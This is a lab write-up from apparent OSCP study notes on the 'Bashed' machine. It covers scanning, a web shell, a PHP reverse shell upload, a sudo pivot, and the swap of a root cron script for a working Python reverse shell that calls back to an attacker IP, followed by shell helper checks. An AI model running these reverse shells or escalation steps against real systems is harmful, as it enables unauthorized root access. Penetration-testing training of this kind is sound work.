OSCP Notes
Bashed
Nmap result:
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
5488/tcp filtered unknown
10459/tcp filtered unknown
11833/tcp filtered unknown
15168/tcp filtered unknown
27876/tcp filtered astrolink
37122/tcp filtered unknown
45155/tcp filtered unknown
53415/tcp filtered unknown
This made me believe that port 80 is the only attack vector; maybe there is somewhere to upload a malicious file?
Ran gobuster
gobuster dir -u http://10.129.165.204:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images
/php
/uploads/
/dev/
Browsing to /dev/ led to a web-based shell (run id there first to see which user it executes as).
PHP version -> PHP 7.0.22-0ubuntu0.16.04.1 (cli) ( NTS )
Upload a reverse shell (pentestmonkey's php-reverse-shell.php, edited with your own IP and port) into /uploads/, start a listener on that port, then browse to /uploads/php-reverse-shell.php to trigger it.

Try to run LinEnum on it (served from the attacking machine with a Python HTTP server and fetched with wget; curl is not installed on the target).

The shell had no tty, so I spawned a proper one with Python's pty module.
Once you have the shell, sudo -l shows you may run commands as scriptmanager, so drop into that user's bash:
sudo -u scriptmanager bash
There is a test.py script that runs every minute from a cron job (run "date" and "ls -la" on the file it writes to confirm it: the timestamp keeps updating).
Replace it with the following reverse shell (start a listener first, e.g. nc -lvnp 5555, and use your own listener IP and port); the cron job runs it on its next pass:
import socket,subprocess,os
# connect back to the attacker's listener (replace with your own IP and port)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.109",5555))
# point stdin, stdout and stderr at the socket so bash talks over it
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# interactive bash; it runs as whatever user cron used to launch this script
subprocess.call(["/bin/bash","-i"])
Why does this come back as root?
  • because the file the script writes is owned by root, which means the cron job runs the script as root, so whatever the script does runs as root too.
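The checks behind the last three steps (tty upgrade, sudo -l, confirming the cron job is root's) as a small set of shell helpers. This is an added example for these notes, not code from the original page: the listener port, the sudo -l sample lines and the output-file path are placeholders or constructed inputs, not values taken from the box.

```shell
#!/bin/sh
# Added example (not from the original notes): helper checks to run on the
# target before swapping the cron script for a reverse shell.
#
# Reference commands for the surrounding steps (placeholder port 5555):
#   attacker:  nc -lvnp 5555
#   target:    python -c 'import pty; pty.spawn("/bin/bash")'   # tty upgrade

# Owner of a file. GNU stat first, BSD/macOS stat as a fallback.
file_owner() {
    stat -c %U "$1" 2>/dev/null || stat -f %Su "$1"
}

# Seconds since the file was last modified.
file_age() {
    mtime=$(stat -c %Y "$1" 2>/dev/null || stat -f %m "$1")
    echo $(( $(date +%s) - mtime ))
}

# Succeeds when FILE is owned by root and was modified within WINDOW seconds
# (default 120). A root-owned file that keeps getting rewritten is the evidence
# that a root cron job is running the script that writes it. Run it again a
# minute later: if the age has dropped back, the job is periodic.
root_cron_evidence() {
    file=$1
    window=${2:-120}
    [ "$(file_owner "$file")" = root ] && [ "$(file_age "$file")" -lt "$window" ]
}

# Reads `sudo -l` output on stdin and succeeds if the current user may run
# commands as USER without a password.
# Usage on the target:  sudo -l | sudo_nopasswd_as scriptmanager
sudo_nopasswd_as() {
    grep -q "($1[^)]*) *NOPASSWD:"
}

# Typical use on the box (OUTFILE is the file the cron script writes):
#   sudo -l | sudo_nopasswd_as scriptmanager && sudo -u scriptmanager bash
#   root_cron_evidence OUTFILE && echo "root cron job is live, safe to replace the script"
```

root_cron_evidence is the check worth doing before overwriting the script: if the output file belonged to scriptmanager rather than root, replacing the script would only hand you a shell as the user you already have.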